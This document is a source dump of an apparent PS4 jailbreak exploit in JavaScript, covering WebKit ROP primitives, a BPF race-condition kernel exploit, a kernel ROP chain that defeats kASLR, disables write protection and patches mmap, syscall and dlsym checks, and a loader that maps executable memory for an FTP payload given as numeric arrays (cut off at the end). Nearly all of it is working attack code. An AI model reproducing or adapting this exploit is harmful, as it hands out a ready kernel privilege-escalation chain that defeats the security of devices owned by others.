 94 | 
 95 |     // Get libkernel module address
 96 |     var libKernelBase  = p.read8(deref_stub_jmp(gadgets['stack_chk_fail']));
 97 |     libKernelBase.low &= 0xffffc000;
 98 |     libKernelBase.sub32inplace(0xc000);
 99 | 
100 |     window.moduleBaseLibKernel = libKernelBase;
101 | 
102 |     var offsetToLibKernel = function(off) {
103 |       return window.moduleBaseLibKernel.add32(off);
104 |     }
105 | 
106 |     // Get libc module address
107 |     var libSceLibcBase = p.read8(deref_stub_jmp(offsetToWebKit(0x228)));
108 |     libSceLibcBase.low &= 0xffffc000;
109 | 
110 |     window.moduleBaseLibc = libSceLibcBase;
111 | 
112 |     var offsetToLibc = function(off) {
113 |       return window.moduleBaseLibc.add32(off);
114 |     }
115 | 
116 |     // Setup ROP launching
117 |     var hold1;
118 |     var hold2;
119 |     var holdz;
120 |     var holdz1;
121 | 
122 |     while (1) {
123 |       hold1 = {a:0, b:0, c:0, d:0};
124 |       hold2 = {a:0, b:0, c:0, d:0};
125 |       holdz1 = p.leakval(hold2);
126 |       holdz = p.leakval(hold1);
127 |       if (holdz.low - 0x30 == holdz1.low) break;
128 |     }
129 | 
130 |     var pushframe = [];
131 |     pushframe.length = 0x80;
132 |     var funcbuf;
133 | 
134 |     var launch_chain = function(chain)
135 |     {
136 |       var stackPointer = 0;
137 |       var stackCookie = 0;
138 |       var orig_reenter_rip = 0;
139 |       
140 |       var reenter_help = {length: {valueOf: function(){
141 |         orig_reenter_rip = p.read8(stackPointer);
142 |         stackCookie = p.read8(stackPointer.add32(8));
143 |         var returnToFrame = stackPointer;
144 |         
145 |         var ocnt = chain.count;
146 |         chain.push_write8(stackPointer, orig_reenter_rip);
147 |         chain.push_write8(stackPointer.add32(8), stackCookie);
148 |         
149 |         if (chain.runtime) returnToFrame=chain.runtime(stackPointer);
150 |         
151 |         chain.push(gadgets["pop rsp"]); // pop rsp
152 |         chain.push(returnToFrame); // -> back to the trap life
153 |         chain.count = ocnt;
154 |         
155 |         p.write8(stackPointer, (gadgets["pop rsp"])); // pop rsp
156 |         p.write8(stackPointer.add32(8), chain.stackBase); // -> rop frame
157 |       }}};
158 |       
159 |       var funcbuf32 = new Uint32Array(0x100);
160 |       nogc.push(funcbuf32);
161 |       funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));
162 |       
163 |       p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
164 |       p.write8(funcbuf.add32(0x80), gadgets["jop"]);
165 |       p.write8(funcbuf,funcbuf);
166 |       p.write8(parseFloatStore, gadgets["jop"]);
167 |       var orig_hold = p.read8(holdz1);
168 |       var orig_hold48 = p.read8(holdz1.add32(0x48));
169 |       
170 |       p.write8(holdz1, funcbuf.add32(0x50));
171 |       p.write8(holdz1.add32(0x48), funcbuf);
172 |       parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);
173 |       p.write8(holdz1, orig_hold);
174 |       p.write8(holdz1.add32(0x48), orig_hold48);
175 |       
176 |       stackPointer = p.read8(funcbuf.add32(0x10));
177 |       stackCookie = p.read8(stackPointer.add32(8));
178 |       rtv=Array.prototype.splice.apply(reenter_help);
179 |       return p.leakval(rtv);
180 |     }
181 | 
182 |     p.loadchain = launch_chain;
183 | 
184 |     // Dynamically resolve syscall wrappers from libkernel
185 |     var kview = new Uint8Array(0x1000);
186 |     var kstr = p.leakval(kview).add32(0x10);
187 |     var orig_kview_buf = p.read8(kstr);
188 |     
189 |     p.write8(kstr, window.moduleBaseLibKernel);
190 |     p.write4(kstr.add32(8), 0x40000);
191 | 
192 |     var countbytes;
193 |     for (var i=0; i < 0x40000; i++)
194 |     {
195 |         if (kview[i] == 0x72 && kview[i+1] == 0x64 && kview[i+2] == 0x6c && kview[i+3] == 0x6f && kview[i+4] == 0x63)
196 |         {
197 |             countbytes = i;
198 |             break;
199 |         }
200 |     }
201 |     p.write4(kstr.add32(8), countbytes + 32);
202 |     
203 |     var dview32 = new Uint32Array(1);
204 |     var dview8 = new Uint8Array(dview32.buffer);
205 |     for (var i=0; i < countbytes; i++)
206 |     {
207 |         if (kview[i] == 0x48 && kview[i+1] == 0xc7 && kview[i+2] == 0xc0 && kview[i+7] == 0x49 && kview[i+8] == 0x89 && kview[i+9] == 0xca && kview[i+10] == 0x0f && kview[i+11] == 0x05)
208 |         {
209 |             dview8[0] = kview[i+3];
210 |             dview8[1] = kview[i+4];
211 |             dview8[2] = kview[i+5];
212 |             dview8[3] = kview[i+6];
213 |             var syscallno = dview32[0];
214 |             window.syscalls[syscallno] = window.moduleBaseLibKernel.add32(i);
215 |         }
216 |     }
217 | 
218 |     // Setup helpful primitives for calling and string operations
219 |     var chain = new window.rop();
220 | 
221 |     p.fcall = function(rip, rdi, rsi, rdx, rcx, r8, r9) {
222 |       chain.clear();
223 |       
224 |       chain.notimes = this.next_notime;
225 |       this.next_notime = 1;
226 | 
227 |       chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
228 |       
229 |       chain.push(window.gadgets["pop rdi"]); // pop rdi
230 |       chain.push(chain.stackBase.add32(0x3ff8)); // where
231 |       chain.push(window.gadgets["mov [rdi], rax"]); // rdi = rax
232 |       
233 |       chain.push(window.gadgets["pop rax"]); // pop rax
234 |       chain.push(p.leakval(0x41414242)); // where
235 |       
236 |       if (chain.run().low != 0x41414242) throw new Error("unexpected rop behaviour");
237 |       
238 |       return p.read8(chain.stackBase.add32(0x3ff8));
239 |     }
240 | 
241 |     p.syscall = function(sysc, rdi, rsi, rdx, rcx, r8, r9) {
242 |       if (typeof sysc == "string") {
243 |         sysc = window.syscallnames[sysc];
244 |       }
245 | 
246 |       if (typeof sysc != "number") {
247 |         throw new Error("invalid syscall");
248 |       }
249 |       
250 |       var off = window.syscalls[sysc];
251 | 
252 |       if (off == undefined) {
253 |         throw new Error("invalid syscall");
254 |       }
255 |       
256 |       return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);
257 |     }
258 | 
259 |     p.writeString = function (addr, str)
260 |     {
261 |       for (var i = 0; i < str.length; i++)
262 |       {
263 |         var byte = p.read4(addr.add32(i));
264 |         byte &= 0xFFFF0000;
265 |         byte |= str.charCodeAt(i);
266 |         p.write4(addr.add32(i), byte);
267 |       }
268 |     }
269 | 
270 |     p.readString = function(addr)
271 |     {
272 |       var byte = p.read4(addr);
273 |       var str  = "";
274 |       while (byte & 0xFF)
275 |       {
276 |         str += String.fromCharCode(byte & 0xFF);
277 |         addr.add32inplace(1);
278 |         byte = p.read4(addr);
279 |       }
280 |       return str;
281 |     }
282 | 
283 |     var spawnthread = function (chain) {
284 |       var longjmp       = offsetToWebKit(0x1458);
285 |       var createThread  = offsetToWebKit(0x116ED40);
286 | 
287 |       var contextp = mallocu32(0x2000);
288 |       var contextz = contextp.backing;
289 |       contextz[0] = 1337;
290 |       p.syscall(324, 1);
291 | 
292 |       var thread2 = new window.rop();
293 | 
294 |       thread2.clear();
295 |       thread2.push(window.gadgets["ret"]); // nop
296 |       thread2.push(window.gadgets["ret"]); // nop
297 |       thread2.push(window.gadgets["ret"]); // nop
298 | 
299 |       thread2.push(window.gadgets["ret"]); // nop
300 |       chain(thread2);
301 | 
302 |       p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
303 |       p.write8(contextp.add32(0x10), thread2.stackBase); // rsp
304 | 
305 |       var test = p.fcall(createThread, longjmp, contextp, stringify("GottaGoFast"));
306 | 
307 |       window.nogc.push(contextz);
308 |       window.nogc.push(thread2);
309 | 
310 |       return thread2;
311 |     }
312 | 
313 |     var run_count = 0;
314 | 
315 |     function kernel_rop_run(fd, scratch) {
316 |       // wait for it
317 |       while (1) {
318 |         var ret = p.syscall("sys_write", fd, scratch, 0x200);
319 |         run_count++;
320 |         if (ret.low == 0x200) {
321 |             return ret;
322 |         }
323 |       }
324 |     }
325 | 
326 |     // Clear errno
327 |     p.write8(offsetToLibKernel(0x7CCF0), 0);
328 | 
329 |     //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
330 |     // KERNEL EXPLOIT BEGINS /////////////////////////////////////////////////////////////////////////////////////////////
331 |     //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
332 | 
333 |     //alert("OHHH WE'RE HALFWAY THERE WOOOOOOAHHH LIVIN ON A PRAYER")
334 | 
335 |     var test = p.syscall("sys_setuid", 0);
336 | 
337 |     // Check if homebrew has already been enabled, if not, run kernel exploit :D
338 |     if(test != '0') {
339 |       /////////////////// STAGE 1: Setting Up Programs ///////////////////
340 | 
341 |       var spadp = mallocu32(0x2000);
342 | 
343 |       // Open first device and bind
344 |       var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
345 | 
346 |       if(fd1 < 0) {
347 |         throw "Failed to open first /dev/bpf device!";
348 |       }
349 |       
350 |       p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
351 | 
352 |       if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
353 |         p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));
354 | 
355 |         if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
356 |           throw "Failed to bind to first /dev/bpf device!";
357 |         }
358 |       }
359 | 
360 |       // Open second device and bind
361 |       var fd2 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
362 | 
363 |       if(fd2 < 0) {
364 |         throw "Failed to open second /dev/bpf device!";
365 |       }
366 | 
367 |       p.syscall("sys_ioctl", fd2, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
368 | 
369 |       if (p.syscall("sys_write", fd2, spadp, 40).low == (-1 >>> 0)) {
370 |         p.syscall("sys_ioctl", fd2, 0x8020426C, stringify("wlan0"));
371 | 
372 |         if (p.syscall("sys_write", fd2, spadp, 40).low == (-1 >>> 0)) {
373 |           throw "Failed to bind to second /dev/bpf device!";
374 |         }
375 |       }
376 | 
377 |       // Setup kchain stack for kernel ROP chain
378 |       var kchainstack = malloc(0x2000);
379 |       
380 |       /////////////////// STAGE 2: Building Kernel ROP Chain ///////////////////
381 |       var kchain  = new krop(p, kchainstack);
382 |       var savectx = malloc(0x200);
383 | 
384 |       // NOP Sled
385 |       kchain.push(window.gadgets["ret"]);
386 |       kchain.push(window.gadgets["ret"]);
387 |       kchain.push(window.gadgets["ret"]);
388 |       kchain.push(window.gadgets["ret"]);
389 |       kchain.push(window.gadgets["ret"]);
390 |       kchain.push(window.gadgets["ret"]);
391 |       kchain.push(window.gadgets["ret"]);
392 |       kchain.push(window.gadgets["ret"]);
393 | 
394 |       // Save context to exit back to userland when finished
395 |       kchain.push(window.gadgets["pop rdi"]);
396 |       kchain.push(savectx);
397 |       kchain.push(offsetToLibc(0x1D3C));
398 | 
399 |       // Defeat kASLR (resolve kernel .text base)
400 |       var kernel_slide = new int64(-0x2610AD0, -1);
401 |       kchain.push(window.gadgets["pop rax"]);
402 |       kchain.push(savectx.add32(0x30));
403 |       kchain.push(window.gadgets["mov rax, [rax]"]);
404 |       kchain.push(window.gadgets["pop rcx"]);
405 |       kchain.push(kernel_slide);
406 |       kchain.push(window.gadgets["add rax, rcx"]);
407 |       kchain.push(window.gadgets["pop rdi"]);
408 |       kchain.push(savectx.add32(0x50));
409 |       kchain.push(window.gadgets["mov [rdi], rax"]);
410 |         
411 |       // Disable kernel write protection
412 |       kchain.push(window.gadgets["pop rax"])
413 |       kchain.push(savectx.add32(0x50));
414 |       kchain.push(window.gadgets["mov rax, [rax]"]);
415 |       kchain.push(window.gadgets["pop rcx"]);
416 |       kchain.push(0x280f79);
417 |       kchain.push(window.gadgets["add rax, rcx"]);
418 |       kchain.push(offsetToWebKit(0x12a16)); // mov rdx, rax
419 |       kchain.push(window.gadgets["pop rax"]);
420 |       kchain.push(0x80040033);
421 |       kchain.push(offsetToWebKit(0x1517c7)); // jmp rdx
422 | 
423 |       // Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
424 |       // E8 C8 37 13 00 41 89 C6 -> B8 00 00 00 00 41 89 C6
425 |       var kexploit_check_patch = new int64(0x000000B8, 0xC6894100);
426 |       kchain.push(window.gadgets["pop rax"])
427 |       kchain.push(savectx.add32(0x50));
428 |       kchain.push(window.gadgets["mov rax, [rax]"]);
429 |       kchain.push(window.gadgets["pop rcx"]);
430 |       kchain.push(0x1144E3);
431 |       kchain.push(window.gadgets["add rax, rcx"]);
432 |       kchain.push(window.gadgets["pop rsi"]);
433 |       kchain.push(kexploit_check_patch);
434 |       kchain.push(window.gadgets["mov [rax], rsi"]);
435 | 
436 |       // Patch sys_mmap: Allow RWX (read-write-execute) mapping
437 |       var kernel_mmap_patch = new int64(0x37b64137, 0x3145c031);
438 |       kchain.push(window.gadgets["pop rax"])
439 |       kchain.push(savectx.add32(0x50));
440 |       kchain.push(window.gadgets["mov rax, [rax]"]);
441 |       kchain.push(window.gadgets["pop rcx"]);
442 |       kchain.push(0x141D14);
443 |       kchain.push(window.gadgets["add rax, rcx"]);
444 |       kchain.push(window.gadgets["pop rsi"]);
445 |       kchain.push(kernel_mmap_patch);
446 |       kchain.push(window.gadgets["mov [rax], rsi"]);
447 | 
448 |       // Patch syscall: syscall instruction allowed anywhere
449 |       var kernel_syscall_patch1 = new int64(0x00000000, 0x40878b49);
450 |       var kernel_syscall_patch2 = new int64(0x909079eb, 0x72909090);
451 |       kchain.push(window.gadgets["pop rax"])
452 |       kchain.push(savectx.add32(0x50));
453 |       kchain.push(window.gadgets["mov rax, [rax]"]);
454 |       kchain.push(window.gadgets["pop rcx"]);
455 |       kchain.push(0x3DC603);
456 |       kchain.push(window.gadgets["add rax, rcx"]);
457 |       kchain.push(window.gadgets["pop rsi"]);
458 |       kchain.push(kernel_syscall_patch1);
459 |       kchain.push(window.gadgets["mov [rax], rsi"]);
460 |       kchain.push(window.gadgets["pop rax"])
461 |       kchain.push(savectx.add32(0x50));
462 |       kchain.push(window.gadgets["mov rax, [rax]"]);
463 |       kchain.push(window.gadgets["pop rcx"]);
464 |       kchain.push(0x3DC621);
465 |       kchain.push(window.gadgets["add rax, rcx"]);
466 |       kchain.push(window.gadgets["pop rsi"]);
467 |       kchain.push(kernel_syscall_patch2);
468 |       kchain.push(window.gadgets["mov [rax], rsi"]);
469 | 
470 |       // Patch sys_dynlib_dlsym: Allow from anywhere
471 |       var kernel_dlsym_patch1 = new int64(0x000352E9, 0x8B489000);
472 |       var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
473 |       kchain.push(window.gadgets["pop rax"])
474 |       kchain.push(savectx.add32(0x50));
475 |       kchain.push(window.gadgets["mov rax, [rax]"]);
476 |       kchain.push(window.gadgets["pop rcx"]);
477 |       kchain.push(0x3CF6FE);
478 |       kchain.push(window.gadgets["add rax, rcx"]);
479 |       kchain.push(window.gadgets["pop rsi"]);
480 |       kchain.push(kernel_dlsym_patch1);
481 |       kchain.push(window.gadgets["mov [rax], rsi"]);
482 |       kchain.push(window.gadgets["pop rax"])
483 |       kchain.push(savectx.add32(0x50));
484 |       kchain.push(window.gadgets["mov rax, [rax]"]);
485 |       kchain.push(window.gadgets["pop rcx"]);
486 |       kchain.push(0x690C0);
487 |       kchain.push(window.gadgets["add rax, rcx"]);
488 |       kchain.push(window.gadgets["pop rsi"]);
489 |       kchain.push(kernel_dlsym_patch2);
490 |       kchain.push(window.gadgets["mov [rax], rsi"]);
491 | 
492 |       // Add custom sys_exec() call to execute arbitrary code as kernel
493 |       var kernel_exec_param = new int64(0, 1);
494 |       kchain.push(window.gadgets["pop rax"])
495 |       kchain.push(savectx.add32(0x50));
496 |       kchain.push(window.gadgets["mov rax, [rax]"]);
497 |       kchain.push(window.gadgets["pop rcx"]);
498 |       kchain.push(0x102b8a0);
499 |       kchain.push(window.gadgets["add rax, rcx"]);
500 |       kchain.push(window.gadgets["pop rsi"]);
501 |       kchain.push(0x02);
502 |       kchain.push(window.gadgets["mov [rax], rsi"]);
503 |       kchain.push(window.gadgets["pop rsi"])
504 |       kchain.push(0x13a39f); // jmp qword ptr [rsi]
505 |       kchain.push(window.gadgets["pop rdi"])
506 |       kchain.push(savectx.add32(0x50));
507 |       kchain.push(offsetToWebKit(0x119d1f0)); //add rsi, [rdi]; mov rax, rsi
508 |       kchain.push(window.gadgets["pop rax"])
509 |       kchain.push(savectx.add32(0x50));
510 |       kchain.push(window.gadgets["mov rax, [rax]"]);
511 |       kchain.push(window.gadgets["pop rcx"]);
512 |       kchain.push(0x102b8a8);
513 |       kchain.push(window.gadgets["add rax, rcx"]);
514 |       kchain.push(window.gadgets["mov [rax], rsi"]);
515 |       kchain.push(window.gadgets["pop rax"])
516 |       kchain.push(savectx.add32(0x50));
517 |       kchain.push(window.gadgets["mov rax, [rax]"]);
518 |       kchain.push(window.gadgets["pop rcx"]);
519 |       kchain.push(0x102b8c8);
520 |       kchain.push(window.gadgets["add rax, rcx"]);
521 |       kchain.push(window.gadgets["pop rsi"]);
522 |       kchain.push(kernel_exec_param);
523 |       kchain.push(window.gadgets["mov [rax], rsi"]);
524 | 
525 |       // Enable kernel write protection
526 |       kchain.push(window.gadgets["pop rax"])
527 |       kchain.push(savectx.add32(0x50));
528 |       kchain.push(window.gadgets["mov rax, [rax]"]);
529 |       kchain.push(window.gadgets["pop rcx"]);
530 |       kchain.push(0x280f70);
531 |       kchain.push(window.gadgets["add rax, rcx"]);
532 |       kchain.push(window.gadgets["jmp rax"])
533 | 
534 |       // To userland!
535 |       kchain.push(window.gadgets["pop rax"]);
536 |       kchain.push(0);
537 |       kchain.push(window.gadgets["ret"]);
538 |       kchain.push(offsetToWebKit(0x3EBD0));
539 | 
540 |       // Setup valid program
541 |       var bpf_valid_prog          = malloc(0x10);
542 |       var bpf_valid_instructions  = malloc(0x80);
543 | 
544 |       p.write8(bpf_valid_instructions.add32(0x00), 0x00000000);
545 |       p.write8(bpf_valid_instructions.add32(0x08), 0x00000000);
546 |       p.write8(bpf_valid_instructions.add32(0x10), 0x00000000);
547 |       p.write8(bpf_valid_instructions.add32(0x18), 0x00000000);
548 |       p.write8(bpf_valid_instructions.add32(0x20), 0x00000000);
549 |       p.write8(bpf_valid_instructions.add32(0x28), 0x00000000);
550 |       p.write8(bpf_valid_instructions.add32(0x30), 0x00000000);
551 |       p.write8(bpf_valid_instructions.add32(0x38), 0x00000000);
552 |       p.write4(bpf_valid_instructions.add32(0x40), 0x00000006);
553 |       p.write4(bpf_valid_instructions.add32(0x44), 0x00000000);
554 | 
555 |       p.write8(bpf_valid_prog.add32(0x00), 0x00000009);
556 |       p.write8(bpf_valid_prog.add32(0x08), bpf_valid_instructions);
557 | 
558 |       // Setup invalid program
559 |       var entry = window.gadgets["pop rsp"];
560 |       var bpf_invalid_prog          = malloc(0x10);
561 |       var bpf_invalid_instructions  = malloc(0x80);
562 | 
563 |       p.write4(bpf_invalid_instructions.add32(0x00), 0x00000001);
564 |       p.write4(bpf_invalid_instructions.add32(0x04), entry.low);
565 |       p.write4(bpf_invalid_instructions.add32(0x08), 0x00000003);
566 |       p.write4(bpf_invalid_instructions.add32(0x0C), 0x0000001E);
567 |       p.write4(bpf_invalid_instructions.add32(0x10), 0x00000001);
568 |       p.write4(bpf_invalid_instructions.add32(0x14), entry.hi);
569 |       p.write4(bpf_invalid_instructions.add32(0x18), 0x00000003);
570 |       p.write4(bpf_invalid_instructions.add32(0x1C), 0x0000001F);
571 |       p.write4(bpf_invalid_instructions.add32(0x20), 0x00000001);
572 |       p.write4(bpf_invalid_instructions.add32(0x24), kchainstack.low);
573 |       p.write4(bpf_invalid_instructions.add32(0x28), 0x00000003);
574 |       p.write4(bpf_invalid_instructions.add32(0x2C), 0x00000020);
575 |       p.write4(bpf_invalid_instructions.add32(0x30), 0x00000001);
576 |       p.write4(bpf_invalid_instructions.add32(0x34), kchainstack.hi);
577 |       p.write4(bpf_invalid_instructions.add32(0x38), 0x00000003);
578 |       p.write4(bpf_invalid_instructions.add32(0x3C), 0x00000021);
579 |       p.write4(bpf_invalid_instructions.add32(0x40), 0x00000006);
580 |       p.write4(bpf_invalid_instructions.add32(0x44), 0x00000001);
581 | 
582 |       p.write8(bpf_invalid_prog.add32(0x00), 0x00000009);
583 |       p.write8(bpf_invalid_prog.add32(0x08), bpf_invalid_instructions);
584 | 
585 |       /////////////////// STAGE 3: Racing Filters ///////////////////
586 | 
587 |       // ioctl() with valid BPF program will trigger free() of old program and reallocate memory for the new one
588 |       spawnthread(function (thread2) {
589 |         interrupt1 = thread2.stackBase;
590 |         thread2.push(window.gadgets["ret"]);
591 |         thread2.push(window.gadgets["ret"]);
592 |         thread2.push(window.gadgets["ret"]);
593 |         thread2.push(window.gadgets["pop rdi"]); // pop rdi
594 |         thread2.push(fd1); // what
595 |         thread2.push(window.gadgets["pop rsi"]); // pop rsi
596 |         thread2.push(0x8010427B); // what
597 |         thread2.push(window.gadgets["pop rdx"]); // pop rdx
598 |         thread2.push(bpf_valid_prog); // what
599 |         thread2.push(window.gadgets["pop rsp"]); // pop rsp
600 |         thread2.push(thread2.stackBase.add32(0x800)); // what
601 |         thread2.count = 0x100;
602 |         var cntr = thread2.count;
603 |         thread2.push(window.syscalls[54]); // ioctl
604 |         thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
605 |         thread2.push(window.gadgets["pop rsp"]); // pop rdx
606 |         thread2.push(thread2.stackBase); // what
607 |       });
608 | 
609 |       // ioctl() with invalid BPF program will be sprayed and eventually get used by the thread where the program has already been validated
610 |       spawnthread(function (thread2) {
611 |         interrupt2 = thread2.stackBase;
612 |         thread2.push(window.gadgets["ret"]);
613 |         thread2.push(window.gadgets["ret"]);
614 |         thread2.push(window.gadgets["ret"]);
615 |         thread2.push(window.gadgets["pop rdi"]); // pop rdi
616 |         thread2.push(fd2); // what
617 |         thread2.push(window.gadgets["pop rsi"]); // pop rsi
618 |         thread2.push(0x8010427B); // what
619 |         thread2.push(window.gadgets["pop rdx"]); // pop rdx
620 |         thread2.push(bpf_invalid_prog); // what
621 |         thread2.push(window.gadgets["pop rsp"]); // pop rsp
622 |         thread2.push(thread2.stackBase.add32(0x800)); // what
623 |         thread2.count = 0x100;
624 |         var cntr = thread2.count;
625 |         thread2.push(window.syscalls[54]); // ioctl
626 |         thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
627 |         thread2.push(window.gadgets["pop rsp"]); // pop rdx
628 |         thread2.push(thread2.stackBase); // what
629 |       });
630 | 
631 |       /////////////////// STAGE 3: Trigger ///////////////////
632 |       var scratch = malloc(0x200);
633 |       var test = kernel_rop_run(fd1, scratch);
634 | 
635 |       if(p.syscall("sys_setuid", 0) == 0) {
636 |         allset();
637 |       } else {
638 |         throw "Kernel exploit failed!";
639 |       }
640 |     } else {
641 |       // Everything done already :D
642 |       allset();
643 |     }
644 | 
645 |     // create loader memory
646 |     var code_addr = new int64(0x26100000, 0x00000009);
647 |     var buffer = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
648 | 
649 |     // verify loaded
650 |     if (buffer == '926100000') {
651 |       // setup the stuff
652 |       var scePthreadCreate = offsetToLibKernel(0x115c0);
653 |       var thread = malloc(0x08);
654 |       var thr_name = malloc(0x10);
655 |       p.writeString(thr_name, "loader");
656 | 
657 |       // write dummy loader
658 |       for (var i = 0; i < loader.length; i++) {
659 |           p.write4(code_addr.add32(i * 4), loader[i]);
660 |       }
661 | 
662 |       // write payload
663 |       for (var i = 0; i < payload.length; i++) {
664 |           p.write4(code_addr.add32(0x100000 + i * 4), payload[i]);
665 |       }
666 | 
667 |       var createRet = p.fcall(scePthreadCreate, thread, 0, code_addr, 0, thr_name);
668 |     }
669 |   } catch(e) {
670 |     fail("Post Exception: " + e)
671 |   }
672 | }
673 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/ftploader.js:
--------------------------------------------------------------------------------
1 | var loader = [2670408,599568,2303197184,3234285822,240,264931657,12077061,153493504,4278190080,50128,1,0,0,0];
2 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/ftppayload.js:
--------------------------------------------------------------------------------
1 | var payload = [2615273,2303218432,3967895802,512,154504520,1207959596,3224496009,968758783,2303197184,8503270,369033216,14520,12878152,1526726658,1431585219,1221734739,830522499,4236855798,1541991729,2197815300,2215641080,128,2370356105,1275602036,2749949833,1157627908,4281452849,3117975873,2,954,1073790464,2263351296,1207959592,1962932355,1955285064,2202554404,813564926,357513345,678763837,407942927,3804349183,71994629,1221157704,343723577,824240771,3529722093,537951361,1179403647,3314814784,4194494,3347662848,2639080,3906963712,990,2162983752,1566304393,1103322177,1096171863,1431585109,3968026707,3871426584,612141344,3590932492,1305315656,2303313289,12534260,1207963648,1484057989,608471876,4253108236,1048576,1224444236,1306347023,4281459081,134218425,113152,2303197184,667936990,2202533888,2303328248,1277981894,2303258505,3330885850,4292673865,3629845,3733538816,3908536652,10165,1239230792,2750143489,440,822274816,3296938176,1096637208,1096630620,3277799774,549618504,3359227953,4030279037,2337022324,3531951378,2337020276,2337015887,961407042,1275884225,1293963011,961400833,4278941377,3263383744,835709752,28885952,3271557120,1447122753,1413567809,4253632597,1409180488,1224444232,1210646379,1226370179,369087625,14052,1240281413,2303323017,4130424256,2111650113,2072726903,4286926112,3649660276,1156221256,2303520393,1149848799,1843922980,1291845631,136594571,158646405,20676929,1970274303,3328395582,810781513,683699016,1237778241,4279717005,1222309704,21809697,1351174336,2022263824,1401637144,680084488,139495752,2168574513,4294902075,3264548719,1092636809,2202650111,2230008003,607422789,415531848,3230223451,1096565085,1096696157,1463927647,1430345281,1398101057,418153288,1224051009,2302792585,1149848782,2370308132,2721077,3709206272,1207959606,2215624837,253,608471884,3314108424,3133245768,1,415466312,1107243333,946910991,1221036364,1211692651,4282435203,3616533,4147725568,11570447,2336751616,369096827,13780,4166224712,2303325745,3347663044,915019263,2072182784,896794632,3899876168,2336805425,3767094539,3908012356,4294966723,1635041413,4034104136,2303250993,3977641967,1207959605,1224242059,29026697,3942645760,864766011,698,4018750464,3906926408,462,1276349256,2302994057,19982575,2336751616,3526488179,4293888328,3518229,864765952,3135867208,1,4293364044,3574549,3884534784,4291297089,3589909,3280160768,4282902824,2202599423,2303203524,1096637423,1096630620,4284432734,3536677,3296937984,1096637208,1096630620,3277799774,1413567809,2202555221,3526437100,838175048,13953270,4169334784,2827227135,1157627904,4281452849,3116403009,2,954,1073790464,3280535552,2428136,4169353216,3297331711,3071244916,2370312256,3340510292,1844292,3238002688,2554856928,71601485,3071230240,1097218160,4079815,3342951936,15424,1086800230,1224736826,1228961933,2638023,1275068416,136594569,4294799336,1149979903,3733522468,472140939,1220905289,2303246985,4263045359,2303524863,3843424239,3187671093,16384,3907488076,9365,803790729,1207959552,1529398403,1096565085,3343434589,960,655354112,3343384576,1216,654567680,3343384576,1472,653781248,3343384576,1728,652994816,3343384576,2752,652208384,3343384576,5824,651421952,3343384576,15040,650635520,3343384576,32960,649849088,3343384576,35008,649062656,3343384576,35264,648276224,3343384576,48320,647489792,3343384576,69824,646703360,3343384576,122560,645916928,3343384576,96960,645130496,1398079488,495667280,13260,1224575304,652164493,369033216,13532,823164299,1213743561,2303246985,1214077912,650327437,3774808064,1213223765,865738123,2303197184,1032669437,9923,883561983,2106261504,1103704336,3263776856,1540917576,898451549,9895,1398137087,495667280,13160,1224575304,649608589,369033216,13432,823164299,1213743561,2303246985,1214077912,647771533,3774808064,1213223765,859184523,2303197184,1032669437,9884,877008383,2106261504,1103704336,3263776856,1540917576,898451549,9856,1398137087,495667280,13060,1224575304,646135181,369033216,13332,823164299,1213743561,2303246985,1214077912,644298125,3774808064,1398101057,1849003336,1207959590,39906433,394985472,611093832,4220078112,2303246385,2232811503,822083635,113353,46006272,1207959552,369094537,12904,270287814,1133117233,1821198356,1137074212,369033757,12984,1133117233,1964375840,2332033074,2370311291,2305170547,280632899,4278190080,3354389,343640832,32958,1360396032,3338666035,269231172,2332033024,2370311291,1208755284,270824589,841881087,2338717696,2333222004,3452677,4069083136,4139126592,1153468737,265336335,3054488758,417907198,283689281,3246997847,3532211286,3233156933,3191180616,1207959589,3224498057,852104703,2337013760,3273509,4018751488,856299007,2072707072,4001974288,2303248689,3573498306,35144647,1207959552,40944769,1566244864,1103322177,1213420884,2202598281,2336776428,153791,4286924800,2370319220,1208427588,203707533,1250773072,1150109697,2370571812,1280312138,822231693,898451648,9643,836638207,2203713536,1951991544,1032669224,9581,1898810184,4278190129,3312405,276531968,2303248689,898451650,9553,50921,1823870720,2370569764,252716132,119831734,2117438792,1140850725,609007119,1153446159,608482831,1286999822,3854634276,1421217544,4244704292,4293364044,3271445,3867757568,609520968,179976,2370568192,4280296548,3203861,1209240320,613889421,2303459328,4290785767,3260181,3133747456,1,702,3884534784,815928831,1137049600,3071217692,339970557,136594571,35472326,4280304521,3192597,407095040,1,4198337864,1711276068,1209942921,816197003,369033216,12736,823163787,3263776969,3660942664,4278190116,3296938197,1096637280,1213449052,2139880329,3910532884,2197815344,1963071611,1014729481,819598847,1137115136,24,1724078848,4026591105,2170970800,1952448767,4286670393,1672486912,2170957940,2961178879,1713861677,1073807233,510944432,16744806,1953542160,4286670357,1940963328,2170948724,2996830463,258781216,1103348293,1213420884,39882637,2168979456,65772,4253632512,1695911240,3187671076,256,837257544,1964376000,1275068463,803612043,2303197184,4246077415,2332033072,2303201405,1221145062,4282499721,3296807124,256,1547787611,1213420995,1209592963,2336816009,153791,4286924800,3224460916,608996680,1418545160,2370307876,2369589,3977641728,2231369775,2319548096,1208427604,797322635,2336751616,3186437,1106935808,4202694004,1209693513,604061069,3506372608,823163787,3263776969,4030041416,3942645795,1032669230,9202,350